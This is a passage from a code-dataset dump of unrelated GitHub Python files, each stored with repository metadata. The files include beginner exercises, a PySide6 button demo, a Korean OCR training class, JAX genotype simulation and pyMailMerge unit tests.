cnn.as_tensor(image, add_to_set=True)\n feat, _ = feature_fn(image, is_training)\n return feat.fields[image.value]\n","repo_name":"torrvision/seqtrack","sub_path":"python/seqtrack/models/feature_nets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12263,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"3445979357","text":"Liste_hobbies = []\nListe_hobbies.append(\n {\"Name\": \"Lecture\", \"Desc\": \"lire des livres\", \"Difficulté\": 1})\nListe_hobbies.append(\n {\"Name\": \"Netflix\", \"Desc\": \"voir des trucs\", \"Difficulté\": 0})\nListe_hobbies.append(\n {\"Name\": \"Natation\", \"Desc\": \"Faire comme les poisson\", \"Difficulté\": 3})\nListe_hobbies.append(\n {\"Name\": \"cuisine\", \"Desc\": \"Faire à manger\", \"Difficulté\": 2})\nListe_hobbies.append(\n {\"Name\": \"Bricolage\", \"Desc\": \"Faire des travaux\", \"Difficulté\": 5})\n\n\nhobbies = []\nhobbies.append(Liste_hobbies[0])\nhobbies.append(Liste_hobbies[1])\n# Employees\nbob = {\n \"Name\": \"bob\",\n \"Age\": 31,\n \"hobbies\": hobbies,\n \"salary\": 2000\n}\n\nalice = {\n \"Name\": \"Alice\",\n \"Age\": 40,\n \"hobbies\": [Liste_hobbies[0],\n {\"Name\": \"Running\",\n \"Desc\": \"courir\",\n \"Difficulté\": 1},\n Liste_hobbies[3]\n ],\n \"salary\": 2000\n}\n\njoe = {\n \"Name\": \"Joe\",\n \"Age\": 25,\n \"hobbies\": [Liste_hobbies[2],\n Liste_hobbies[4]\n ],\n \"salary\": 2000\n}\n\n# Les services\n\nmarketing = {\n \"Name\": \"Marketing\",\n \"Description\": \"tchatch\",\n \"nbr_emp\": 0,\n \"emp\": []\n}\n\nit = {\n \"Name\": \"IT\",\n \"Description\": \"tech\",\n \"nbr_emp\": 0,\n \"emp\": []\n}\n\nfinance = {\n \"Name\": \"Finance\",\n \"Description\": \"Money\",\n \"nbr_emp\": 0,\n \"emp\": []\n}\n\nit[\"emp\"].append(bob)\nit[\"emp\"].append(\n {\n \"Name\": \"Victor\",\n \"Age\": 23,\n \"hobbies\": [Liste_hobbies[3], Liste_hobbies[4]],\n \"salary\": 2000\n })\nit[\"nbr_emp\"] = len(it[\"emp\"]) # Calcul nombre d'employe du service\n\n\nmarketing[\"emp\"].append(alice)\nmarketing[\"emp\"].append(\n {\n \"Name\": \"Marry\",\n \"Age\": 25,\n \"hobbies\": [Liste_hobbies[3], Liste_hobbies[4]],\n \"salary\": 2000\n })\nmarketing[\"nbr_emp\"] = len(it[\"emp\"]) # Calcul nombre d'employe du service\n\nfinance[\"emp\"].append(joe)\nfinance[\"emp\"].append(\n {\n \"Name\": \"Kevin\",\n \"Age\": 25,\n \"hobbies\": [Liste_hobbies[3], Liste_hobbies[4]],\n \"salary\": 2000\n })\nfinance[\"nbr_emp\"] = len(it[\"emp\"]) # Calcul nombre d'employe du service\n\nListe_service = [marketing, it, finance]\n\n\n# for srv in Liste_service:\n# for emp in srv[\"emp\"]:\n# print(\"Employé : \"+emp[\"Name\"])\n# print(\"Hobbies : \")\n# print(emp[\"hobbies\"])\n# print(\"**************************\")\n\njoe[\"hobbies\"].append({\"Name\": \"surf\"})\n\n# Augmenter le salaire\nfor emp in it[\"emp\"]:\n emp[\"salary\"] += 1000\n# reduire le salaire\nfor emp in finance[\"emp\"]:\n emp[\"salary\"] -= 500\nfor emp in marketing[\"emp\"]:\n emp[\"salary\"] -= 500\n\n# Retirer Kevin et l'affecter au service marketing\nkevin = {}\nindex = 0\nfor emp in finance[\"emp\"]:\n if emp[\"Name\"] == \"Kevin\":\n kevin = emp\n finance[\"emp\"].pop(index)\n finance[\"nbr_emp\"] = len(finance[\"emp\"])\n marketing[\"emp\"].append(kevin)\n marketing[\"nbr_emp\"] = len(marketing[\"emp\"])\n break\n index += 1\n\n\nprint(\"Marketing : \")\nprint(marketing[\"nbr_emp\"])\nprint(marketing[\"emp\"])\n\nprint(\"************************\")\n\nprint(\"finance : \")\nprint(finance[\"nbr_emp\"])\nprint(finance[\"emp\"])\n\nprint(\"************************\")\n\nprint(\"IT : \")\nprint(it[\"nbr_emp\"])\nprint(it[\"emp\"])\n","repo_name":"EYassir/initiation-python","sub_path":"examples/sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"22984547047","text":"from PySide6.QtWidgets import QApplication, QMainWindow, QPushButton\nimport sys\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n # Set the window title and size\n self.setWindowTitle(\"Button Example\")\n self.setGeometry(100, 100, 300, 200)\n\n # Create the button and add it to the window\n self.button = QPushButton(\"Click Me!\", self)\n self.button.setGeometry(100, 50, 100, 50)\n\n # Add a listener to the button that prints a message to the console\n self.button.clicked.connect(self.buttonClicked)\n\n def buttonClicked(self):\n print(\"Button clicked!\")\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())","repo_name":"thomasNewton/tic_tac","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11941916819","text":"class Account:\n \"\"\"An account has a balance and a holder.\n >>> a = Account('John')\n >>> a.deposit(10)\n 10\n >>> a.balance\n 10\n >>> a.interest\n 0.02\n >>> a.time_to_retire(10.25) # 10 -> 10.2 -> 10.404\n 2\n >>> a.balance # balance should not change\n 10\n >>> a.time_to_retire(11) # 10 -> 10.2 -> ... -> 11.040808032\n 5\n >>> a.time_to_retire(100)\n 117\n \"\"\"\n max_withdrawal = 10\n interest = 0.02\n\n def __init__(self, account_holder):\n self.balance = 0\n self.holder = account_holder\n\n def deposit(self, amount):\n self.balance = self.balance + amount\n return self.balance\n\n def withdraw(self, amount):\n if amount > self.balance:\n return \"Insufficient funds\"\n if amount > self.max_withdrawal:\n return \"Can't withdraw that amount\"\n self.balance = self.balance - amount\n return self.balance\n\n def time_to_retire(self, amount):\n \"\"\"Return the number of years until balance would grow to amount.\"\"\"\n assert self.balance > 0 and amount > 0 and self.interest > 0\n year, curAmount = 0, self.balance\n while True:\n year += 1\n curAmount *= (1 + self.interest)\n if curAmount > amount:\n return year\n\n\nclass FreeChecking(Account):\n \"\"\"A bank account that charges for withdrawals, but the first two are free!\n >>> ch = FreeChecking('Jack')\n >>> ch.balance = 20\n >>> ch.withdraw(100) # First one's free\n 'Insufficient funds'\n >>> ch.withdraw(3) # And the second\n 17\n >>> ch.balance\n 17\n >>> ch.withdraw(3) # Ok, two free withdrawals is enough\n 13\n >>> ch.withdraw(3)\n 9\n >>> ch2 = FreeChecking('John')\n >>> ch2.balance = 10\n >>> ch2.withdraw(3) # No fee\n 7\n >>> ch.withdraw(3) # ch still charges a fee\n 5\n >>> ch.withdraw(5) # Not enough to cover fee + withdraw\n 'Insufficient funds'\n \"\"\"\n withdraw_fee = 1\n free_withdrawals = 2\n\n def withdraw(self, amount):\n if self.free_withdrawals > 0:\n if amount > self.balance:\n self.free_withdrawals -= 1\n return \"Insufficient funds\"\n if amount > self.max_withdrawal:\n self.free_withdrawals -= 1\n return \"Can't withdraw that amount\"\n self.free_withdrawals -= 1\n self.balance = self.balance - amount\n else:\n if amount + self.withdraw_fee > self.balance:\n self.free_withdrawals -= 1\n return \"Insufficient funds\"\n if amount + self.withdraw_fee > self.max_withdrawal:\n self.free_withdrawals -= 1\n return \"Can't withdraw that amount\"\n self.balance = self.balance - amount - self.withdraw_fee\n\n return self.balance\n \n","repo_name":"MartinLwx/CS61A-Fall-2021-UCB","sub_path":"Labs/lab07/lab07.py","file_name":"lab07.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"19684966065","text":"def cipher(sentence):\n\t'''\n\t英小文字ならば(219 - 文字コード)の文字に置換\n\tその他の文字はそのまま出力\n\t参考: https://note.nkmk.me/python-capitalize-lower-upper-title/\n\t参考: https://tanishiking24.hatenablog.com/entry/python-charset\n\n\t引数:文字列\n\t戻り値:変換した文字列\n\t'''\n\n\tresult = \"\"\n\tprint(f'変換前: {sentence}')\n\n\tfor char in sentence:\n\t\tif char.islower():\n\t\t\t#ord()により、ある文字に対応するコードポイント(の10進数表記を得ることができる)\n\t\t\t#chr()により、あるコードポイント(の10進数整数)から対応する文字を得ることができる\n \t\t\tresult = result + chr(219 - ord(char))\n\t\t\t#その他\n\t\telse:\n\t\t\tresult = result + char\n\n\treturn result\n\nprint(\"変換後:\", cipher(\"Hikaru_Morita\"))","repo_name":"cdlab-sit/100knock","sub_path":"kumbikumbiSIC/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18241299468","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport dataset\nimport utils.korean_manager as korean_manager\nfrom PIL import Image\nimport random\nimport os\nfrom IPython.display import clear_output\nimport gc\nimport wandb\nimport datetime\nimport shutil\nfrom tqdm import tqdm\nfrom keras_adabound import AdaBound\nimport utils.predict_char as predict_char\nfrom utils.model_architectures import VGG16,InceptionResnetV2,MobilenetV3,EfficientCNN,AFL_Model\nfrom utils.MelnykNet import melnyk_net\nclass KoOCR():\n def __init__(self,split_components=True,weight_path='',fc_link='',network_type='melnyk',image_size=96,direct_map=False,refinement_t=4,\\\n iterative_refinement=False,data_augmentation=False,adversarial_learning=False):\n self.split_components=split_components\n self.iterative_refinement=iterative_refinement\n self.refinement_t=refinement_t\n self.charset=korean_manager.load_charset()\n self.adversarial_learning=adversarial_learning\n #Build and load model\n if weight_path:\n self.model = tf.keras.models.load_model(weight_path,compile=False)\n else:\n model_list={'VGG16':VGG16,'inception-resnet':InceptionResnetV2,'mobilenet':MobilenetV3,'efficient-net':EfficientCNN,'melnyk':melnyk_net,\n 'afl':AFL_Model}\n settings={'split_components':split_components,'input_shape':image_size,'direct_map':direct_map,'fc_link':fc_link,'refinement_t':refinement_t,\\\n 'iterative_refinement':iterative_refinement,'data_augmentation':data_augmentation,'adversarial_learning':adversarial_learning}\n self.model=model_list[network_type](settings)\n if iterative_refinement:\n self.decoders=self.find_decoders()\n \n def find_decoders(self):\n return 0\n \n def predict(self,image,n=1):\n if self.split_components:\n return predict_char.predict_split(self.model,image,n)\n else:\n return predict_char.predict_complete(self.model,image,n)\n \n def plot_val_image(self,val_data):\n #Load validation data\n val_x,val_y=val_data\n #Predict classes\n indicies=random.sample(range(len(val_x)),10)\n val_x=val_x[indicies]\n pred_y=self.predict(val_x,10)\n\n fig = plt.figure(figsize=(10,1))\n for idx in range(10):\n plt.subplot(1,10,idx+1)\n plt.imshow(val_x[idx],cmap='gray')\n plt.axis('off')\n plt.savefig('./logs/image.png')\n print(pred_y)\n\n def compile_adversarial_model(self,lr,opt,adversarial_ratio=0):\n #build adversarial model for training\n input_image=self.model.input\n disc_output=self.model.get_layer('DISC')\n\n self.discriminator=tf.keras.models.Model(self.model.input,disc_output.output)\n\n for l in self.model.layers:\n l.trainable=False\n \n self.model.get_layer('disc_start').trainable=True\n self.model.get_layer('DISC').trainable=True\n\n lr=lr*adversarial_ratio*3\n if opt =='sgd':\n optimizer=tf.keras.optimizers.SGD(lr)\n elif opt=='adam':\n optimizer=tf.keras.optimizers.Adam(lr)\n elif opt=='adabound':\n optimizer=AdaBound(lr=lr,final_lr=lr*100)\n\n self.discriminator.compile(optimizer=optimizer,loss='binary_crossentropy')\n\n def compile_model(self,lr,opt,adversarial_ratio=0):\n def inverse_bce(y_true,y_pred):\n y_true=y_true*-1+1\n return tf.keras.losses.binary_crossentropy(y_true,y_pred)\n\n #Compile model \n if opt =='sgd':\n optimizer=tf.keras.optimizers.SGD(lr)\n elif opt=='adam':\n optimizer=tf.keras.optimizers.Adam(lr)\n elif opt=='adabound':\n optimizer=AdaBound(lr=lr,final_lr=lr*100)\n \n if self.iterative_refinement:\n losses=\"categorical_crossentropy\"\n elif self.split_components:\n if self.adversarial_learning:\n losses = {\n \"CHOSUNG\": \"categorical_crossentropy\",\n \"JUNGSUNG\": \"categorical_crossentropy\",\n \"JONGSUNG\": \"categorical_crossentropy\",\n 'DISC':inverse_bce}\n if self.fit_discriminator:\n lossWeights = {\"CHOSUNG\": 1.0-adversarial_ratio, \"JUNGSUNG\": 1.0-adversarial_ratio,\n \"JONGSUNG\":1.0-adversarial_ratio,\"DISC\":3*adversarial_ratio}\n else:\n lossWeights = {\"CHOSUNG\": 1.0, \"JUNGSUNG\": 1.0,\"JONGSUNG\":1.0,\"DISC\":0}\n else:\n losses = {\n \"CHOSUNG\": \"categorical_crossentropy\",\n \"JUNGSUNG\": \"categorical_crossentropy\",\n \"JONGSUNG\": \"categorical_crossentropy\"}\n lossWeights = {\"CHOSUNG\": 1.0, \"JUNGSUNG\": 1.0,\"JONGSUNG\":1.0}\n else:\n losses=\"categorical_crossentropy\"\n lossWeights=None\n \n if self.adversarial_learning:\n self.model.trainable=True\n self.model.get_layer('disc_start').trainable=False\n self.model.get_layer('DISC').trainable=False\n \n self.model.compile(optimizer=optimizer, loss=losses,metrics=[\"accuracy\"],loss_weights=lossWeights)\n\n def fit_adversarial(self,train_x,train_y,val_x,val_y,batch_size):\n train_dataset = tf.data.Dataset.from_tensor_slices((train_x, train_y)).batch(batch_size)\n loss_arr,total_p=0,0\n \n if self.verbose==1:\n pbar=tqdm(train_dataset)\n else:\n pbar=train_dataset\n for image,label in pbar:\n out=self.model.train_on_batch(image,label)\n loss_arr+=np.array(out)\n total_p+=1\n \n if self.fit_discriminator:\n self.discriminator.train_on_batch(image,label['DISC'])\n results = self.model.evaluate(val_x, val_y, batch_size=128,verbose=self.verbose)\n print(\"Training L:\", list(loss_arr/total_p))\n\n loss_dict = {name+'_loss': pred for name, pred in zip(self.model.output_names, out[:len(out)//2])}\n acc_dict = {name+'_accuracy': pred for name, pred in zip(self.model.output_names, out[len(out)//2:])}\n z = {**loss_dict, **acc_dict}\n return z\n\n def train(self,epochs=10,lr=0.001,data_path='./data',patch_size=10,batch_size=32,optimizer='adabound',zip_weights=False,\n adversarial_ratio=0.15,log_tensorboard=True,log_wandb=False,setup_wandb=False,fit_discriminator=True,silent_mode=False):\n def write_tensorboard(summary_writer,history,step):\n with summary_writer.as_default():\n if self.split_components:\n tf.summary.scalar('training_loss', history.history['loss'][0], step=step)\n tf.summary.scalar('CHOSUNG_accuracy', history.history['CHOSUNG_accuracy'][0], step=step)\n tf.summary.scalar('JUNGSUNG_accuracy', history.history['JUNGSUNG_accuracy'][0], step=step)\n tf.summary.scalar('JONGSUNG_accuracy', history.history['JONGSUNG_accuracy'][0], step=step)\n\n tf.summary.scalar('val_loss', history.history['val_loss'][0], step=step)\n tf.summary.scalar('val_CHOSUNG_accuracy', history.history['val_CHOSUNG_accuracy'][0], step=step)\n tf.summary.scalar('val_JUNGSUNG_accuracy', history.history['val_JUNGSUNG_accuracy'][0], step=step)\n tf.summary.scalar('val_JONGSUNG_accuracy', history.history['val_JONGSUNG_accuracy'][0], step=step)\n else:\n tf.summary.scalar('training_loss', history.history['loss'][0], step=step)\n tf.summary.scalar('val_loss', history.history['accuracy'][0], step=step)\n tf.summary.scalar('training_accuracy', history.history['val_loss'][0], step=step)\n tf.summary.scalar('val_accuracy', history.history['val_accuracy'][0], step=step)\n \n def setup_wandboard():\n wandb.init(project=\"KoOCR\", config={\n 'AFL': self.adversarial_learning,\n 'Iterative Refinement': self.iteratve_refinement,\n \"optiminzer\": optimizer,\n \"batch_size\": batch_size,\n 'learning_rate':lr,\n 'AFL ratio':adversarial_ratio,\n 'Split components':self.split_components\n })\n def write_wandb(history):\n wandb.log(history)\n train_dataset=dataset.DataPickleLoader(split_components=self.split_components,data_path=data_path,patch_size=patch_size,\n return_image_type=self.adversarial_learning,silent_mode=silent_mode)\n val_x,val_y=train_dataset.get_val()\n if self.iterative_refinement:\n val_y=[val_y['CHOSUNG'],val_y['JUNGSUNG'],val_y['JONGSUNG']]*self.refinement_t\n self.fit_discriminator=fit_discriminator\n self.compile_model(lr,optimizer,adversarial_ratio)\n if self.adversarial_learning:\n self.compile_adversarial_model(lr,optimizer,adversarial_ratio)\n\n summary_writer = tf.summary.create_file_writer(\"./logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n if setup_wandb:\n setup_wandboard()\n step=0\n \n if silent_mode:\n self.verbose=2\n else:\n self.verbose=1\n\n for epoch in range(epochs):\n print('Training epoch',epoch)\n self.plot_val_image(val_data=(val_x,val_y))\n epoch_end=False\n while epoch_end==False:\n #Train on loaded dataset batch\n train_x,train_y,epoch_end=train_dataset.get()\n if self.iterative_refinement:\n train_y=[train_y['CHOSUNG'],train_y['JUNGSUNG'],train_y['JONGSUNG']]*self.refinement_t\n\n if self.adversarial_learning:\n history=self.fit_adversarial(train_x,train_y,val_x,val_y,batch_size)\n else:\n history=self.model.fit(x=train_x,y=train_y,epochs=1,validation_data=(val_x,val_y),batch_size=batch_size,verbose=self.verbose)\n #Log losses to Tensorboard\n if log_tensorboard:\n write_tensorboard(summary_writer,history,step)\n if log_wandb:\n write_wandb(history)\n step+=1\n #Clear garbage memory\n tf.keras.backend.clear_session()\n gc.collect()\n \n #Save weights in checkpoint\n self.model.save('./logs/weights', save_format='tf')\n if zip_weights:\n shutil.make_archive('weights_epoch_'+str(epoch), 'zip', './logs/weights')","repo_name":"sieu-n/KoOCR-tensorflow","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10781,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"42688054611","text":"import jax\nimport jax.numpy as jnp\nimport jax.numpy.linalg as jnla\nimport jax.random as rdm\n\nimport pandas_plink as pdp\n\n# naive simulation of genotype with no LD structure\ndef naive_sim_genotype(n_samples: int, p_snps: int, rng_key):\n \"\"\"Simulate genotype with no LD.\n\n Args:\n n_samples: the number of samples to simulate.\n p_snps: the number of SNPs to simulate.\n rng_key: the `jax.random.PRNGKey` to sample data with\n\n Returns:\n `jax.ndarray`: A 0/1/2 genotype matrix of shape `n_samples` by `p_snps`.\n \"\"\"\n key, f_key, h1_key, h2_key = rdm.split(rng_key, 4)\n freq = rdm.uniform(f_key, shape=(p_snps,), minval=0.01, maxval=0.5)\n h1 = rdm.bernoulli(h1_key, freq, shape=(n_samples, p_snps)).astype(float)\n h2 = rdm.bernoulli(h2_key, freq, shape=(n_samples, p_snps)).astype(float)\n\n X = h1 + h2\n\n return X\n\n\ndef sim_geno_from_plink(prefix: str, n_samples: int, rng_key, ld_ridge: float = 0.01):\n \"\"\"Simulate approximate genotypes using real genotype data from a PLINK\n dataset. Simulated data will reflect LD patterns in real data, but have\n continous approximations to genotype data under an MVN.\n\n Args:\n prefix: the path to the PLINK triplet.\n n_samples: the number of samples to generate.\n rng_key: the `jax.random.PRNGKey` to sample data with.\n ld_ridge: an offset to ensure that the LD matrix is PSD.\n \"\"\"\n\n # return cholesky L and ldscs\n bim, fam, G = pdp.read_plink(prefix, verbose=False)\n G = jnp.asarray(G.T.compute())\n\n n, p = G.shape\n # estimate LD for population from PLINK data\n G = (G - jnp.mean(G, axis=0)) / jnp.std(G, axis=0)\n\n # regularize so that LD is PSD\n LD = jnp.dot(G.T, G) / n + jnp.eye(p) * ld_ridge\n\n # re-adjust to get proper correlation matrix\n LD = LD / (1 + ld_ridge)\n\n # compute cholesky decomp for faster sampling/simulation\n L = jnla.cholesky(LD)\n\n p, p = L.shape\n\n Z = (L @ rdm.normal(rng_key, shape=(n_samples, p)).T).T\n Z -= jnp.mean(Z, axis=0)\n Z /= jnp.std(Z, axis=0)\n\n return Z\n","repo_name":"USCbiostats/PM570-Colab","sub_path":"sim/geno.py","file_name":"geno.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37462328802","text":"#!/usr/bin/env python\nfrom sys import path\n#from mms.OfficeDocument import *\n#from mms.OfficeDocument.OfficeDocument import OfficeDocument\n#from pyMailMerge import *\n#from OfficeDocument import WriterDocument\npath.append( '..' )\nfrom mms import pyMailMerge\nfrom mms.OfficeDocument import *\nfrom mms.OfficeDocument.WriterDocument import WriterDocument\n\nimport unittest\nimport os\n#define unit tests\nclass testPyMailMerge( unittest.TestCase ):\n xml = r'''\n \n fake::token\n value1\n \n \n fake::array\n firstInspect\n second\n \n \n token::fake\n value2\n \n '''\n def setUp(self):\n pass\n def test_sortParams(self):\n x = pyMailMerge._sortParams( [\n { 'token':'fake::token','value':'value' }, \n { 'token':'html|fake::withhtml','value':'

    whatever

    ' }, \n { 'token':'repeatrow|fake::repeatingrow','value':['row1','row2'] }, \n { 'token':'fake::tokens','value':['1','2'] }, \n { 'token':'if|fake::ifstatement', 'value':'1' } \n ] )\n self.assertEquals( 'if|fake::ifstatement', x[0]['token'] )\n self.assertEquals( 'repeatrow|fake::repeatingrow', x[1]['token'] )\n self.assertEquals( 'html|fake::withhtml', x[2]['token'] )\n #don't care about the other two tokens as long as the order of the ones with modifiers is correct\n self.assertEquals( 5, len( x ) )\n def test_readParamsFromXML(self):\n x = pyMailMerge._readParamsFromXML( self.xml )\n self.assertEquals( 'fake::token', x[0]['token'] )\n self.assertEquals( 'value1', x[0]['value'] )\n self.assertEquals( 'fake::array', x[1]['token'] )\n self.assertEquals( 'first', x[1]['value'][0] )\n self.assertEquals( 'second', x[1]['value'][1] )\n self.assertEquals( 'token::fake', x[2]['token'] )\n self.assertEquals( 'value2', x[2]['value'] )\n \"\"\"def test_process(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/invoice.odt' ) )\n pmm = pyMailMerge( path )\n x = [\n { 'token':'company::name','value':'Random Company' }, \n { 'token':'company::address1','value':'123 Mystery Lane' }, \n { 'token':'company::city','value':\"Winnipeg\" }, \n { 'token':'company::prov','value':\"MB\" }, \n { 'token':'company::phone', 'value':'123-555-4567' },\n { 'token':\"client::company\", \"value\":\"Client Company\" },\n { 'token':'client::name', 'value':'Random Dude' },\n { 'token':'client::city', 'value':'Brandon' },\n { 'token':'client::prov', 'value':'MB' },\n { 'token':'client::postalcode', 'value':'R3J 2U8' },\n { 'token':'repeatrow|product::desc', 'value':['SKU 123 - Hammer','SKU 223 - Nail'] },\n { 'token':'product::rate', 'value':['6.98','1.99'] },\n { 'token':'product::qty', 'value':[ '1', '10' ] },\n { 'token':'product::total', 'value':['6.98', '19.90' ] },\n { 'token':'if|paid', 'value':'1' },\n { 'token':'if|notpaid', 'value':'0' },\n { 'token':'paid::date', 'value':'Jan 01, 3011' },\n { 'token':'payment::due', 'value':'Feb 01, 3011' },\n { 'token':'paid', 'value':'PAID' },\n { 'token':'html|notes', 'value':'

    Terms:

    1. Payment due in 30 days.
    2. No refunds
    ' },\n { 'token':'repeatsection|repeater', 'value':'2' }\n ]\n pmm._process( x )\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/invoice.out.odt' ) )\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/invoice.out.pdf' ) )\n \"\"\"\n def test_getTokens(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/invoice.odt' ) )\n pmm = pyMailMerge( path )\n x = pmm.getTokens()\n x.sort()\n self.assertEquals( 0, x.index( '~client::city~' ) ) \n self.assertEquals( 1, x.index( '~client::company~' ) ) \n self.assertEquals( 2, x.index( '~client::name~' ) )\n self.assertEquals( 3, x.index( '~client::postalcode~' ) ) \n self.assertEquals( 4, x.index( '~client::prov~' ) )\n self.assertTrue( '~company::city~' in x )\n self.assertTrue( '~company::phone~' in x )\n self.assertTrue( '~company::prov~' in x )\n self.assertTrue( '~endif|notpaid~' in x )\n self.assertTrue( '~endif|paid~' in x )\n self.assertTrue( '~html|notes~' in x )\n self.assertTrue( '~if|notpaid~' in x )\n self.assertTrue( '~if|paid~' in x )\n self.assertTrue( '~paid::date~' in x )\n self.assertTrue( '~payment::due~' in x )\n self.assertTrue( '~product::qty~' in x )\n self.assertTrue( '~product::rate~' in x )\n self.assertTrue( '~product::total~' in x )\n self.assertTrue( '~repeatrow|product::desc~' in x )\n \"\"\"\n #this odt file is missing... Will have to re-create\n def testRepeatSection(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSection.odt' ) )\n pmm = pyMailMerge( path )\n x = [\n { 'token':'repeatsection|first', 'value':'4' }\n ]\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSection.out.pdf' ) )\n \"\"\"\n \"\"\"\n #this odt file is missing... Will have to re-create\n def testRepeatSectionReadOnly(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSection_readonly.odt' ) )\n pmm = pyMailMerge( path )\n x = [\n { 'token':'repeatsection|first', 'value':'4' }\n ]\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSection_readonly.out.pdf' ) )\n \"\"\"\n def testRepeatSectionTable(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSectionTable.odt' ) )\n pmm = pyMailMerge( path )\n x = [\n { 'token':'repeatsection|first', 'value':'4' }\n ]\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSectionTable.out.pdf' ) )\n '''def testSpreadsheet( self ):\n import datetime\n today = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/spreadsheet.ods' ) )\n pmm = pyMailMerge( path, 'ods' )\n x = [\n { 'token':'repeatrow|invoice', 'value':['1', '2', '3', '4'] },\n { 'token':'total', 'value':['1213.23' ,'531.34', '654.21', '3123.3'] },\n { 'token':'date', 'value':['2011-01-01','2011-01-07','2011-01-03','2011-01-02'] },\n { 'token':'today', 'value':today }\n ]\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/spreadsheet.out.xls' ) )\n '''\n\n def test_repeatrow_test_for_ted(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/repeatrow_test_for_ted.odt' ) )\n outFile = os.path.join( os.path.dirname( __file__ ), 'docs/repeatrow_test_for_ted.out.odt' )\n pmm = pyMailMerge( path )\n \n f = open( os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'fixtures/repeatrow_test_for_ted.xml' ) ) )\n\n x = pyMailMerge._readParamsFromXML( f.read() )\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( outFile )\n \n tableData = self._getFirstTableData( outFile )\n \n expectedOutcome = [ [ 'Benefit', 'Assurance', 'Financial'], \n [ 'Life Benefit', ' - ', ' - '],\n [ 'Officers', '10000', '10000' ],\n [ 'Owners/Officers/Managers', '10000', '10000' ],\n [ 'Dental Benefit', ' - ', ' - ' ], \n [ 'Employees', '10000', '10000' ], \n [ 'Officers', '10000', '10000' ],\n [ 'Health Benefit', ' - ', ' - ' ],\n [ 'Officers', '10000', '10000' ],\n [ 'LTD Benefit', ' - ', ' - ' ],\n [ 'Officers', '10000', '10000' ],\n [ 'Weekly Income Benefit', ' - ', ' - ' ],\n [ 'Officers', '10000', '10000' ]\n ]\n \n self.assertEquals( expectedOutcome, tableData )\n self.assertEquals( 13, len( tableData ) )\n\n def test_repeatrow_and_repeatcolumn(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/repeat_row_and_column.odt' ) )\n outFile = os.path.join( os.path.dirname( __file__ ), 'docs/repeat_row_and_column.out.odt' )\n pmm = pyMailMerge( path )\n \n f = open( os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'fixtures/repeatrow_and_repeatcolumn.xml' ) ) )\n\n x = pyMailMerge._readParamsFromXML( f.read() )\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( outFile )\n \n tableData = self._getFirstTableData( outFile )\n \n expectedOutcome = [ [ 'Name', 'name', 'life_benefit', 'life', 'add', 'dep_life', \n 'crit_illness', 'eap', 'wi_benefit', 'wi', 'ltd_benefit', 'ltd',\n 'ehb', 'dental', 'total', \"Total\" ],\n [u'Test User', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'Test User 2', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', 